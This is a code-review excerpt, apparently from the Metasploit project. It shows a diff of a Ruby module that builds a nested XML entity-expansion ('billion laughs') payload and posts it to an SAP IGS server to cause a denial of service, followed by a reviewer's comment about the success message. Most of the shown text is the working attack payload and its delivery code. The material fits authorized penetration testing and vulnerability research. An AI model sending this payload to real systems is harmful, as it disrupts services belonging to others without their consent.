modules/auxiliary/admin/sap/sap_igs_xxe.rb

```diff
@@ -0,0 +1,420 @@
+    data_xml[:data] = %{<?xml version='1.0' encoding='UTF-8'?>
+    <ChartData>
+      <Categories>
+        <Category>ALttP</Category>
+      </Categories>
+      <Series label="Hyrule">
+        <Point>
+          <Value type="y">4444</Value>
+        </Point>
+      </Series>
+    </ChartData>}
+
+    xxe_xml = { name: 'custo' , filename: 'custo.xml', data: nil }
+    xxe_xml[:data] = %{<?xml version='1.0' encoding='UTF-8'?>
+    <!DOCTYPE Extension [
+      <!ENTITY dos 'dos'>
+      <!ENTITY dos1 '&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;'>
+      <!ENTITY dos2 '&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;'>
+      <!ENTITY dos3 '&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;'>
+      <!ENTITY dos4 '&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;'>
+      <!ENTITY dos5 '&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;'>
+      <!ENTITY dos6 '&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;'>
+      <!ENTITY dos7 '&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;'>
+      <!ENTITY dos8 '&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;'>
+    ]>
+    <SAPChartCustomizing version="1.1">
+      <Elements>
+        <ChartElements>
+          <Title>
+            <Extension>&dos8;</Extension>
+          </Title>
+        </ChartElements>
+      </Elements>
+    </SAPChartCustomizing>}
+
+    data = Rex::MIME::Message.new
+    data.add_part(data_xml[:data], 'application/xml', nil, "form-data; name=\"#{data_xml[:name]}\"; filename=\"#{data_xml[:filename]}\"")
+    data.add_part(xxe_xml[:data], 'application/xml', nil, "form-data; name=\"#{xxe_xml[:name]}\"; filename=\"#{xxe_xml[:filename]}\"")
+    # endregion
+
+    # region Send HTTP request
+    begin
+      dos_response = nil
+      dos_response = send_request_cgi(
+          {
+              'uri' => normalize_uri(@urn),
+              'method' => 'POST',
+              'ctype' => "multipart/form-data; boundary=#{data.bound}",
+              'data' => data.to_s,
+          }, @timeout
+      )
+    rescue Timeout::Error
+      report_vuln(
+          host: @host,
+          port: @port,
+          name: self.name,
+          refs: self.references
+      )
+      print_good("DOS SAP IGS #{@host}:#{@port}")
```

Comment:
This isn't descriptive of what is going on here. Please update this with a message along the lines of `Successfully managed to DOS the SAP IGS server at #{@host}:#{@port}`

Reply:
https://github.com/rapid7/metasploit-framework/blob/09532500b87af0d16f80b622d487dde481aac54d/modules/auxiliary/admin/sap/sap_igs_xxe.rb#L330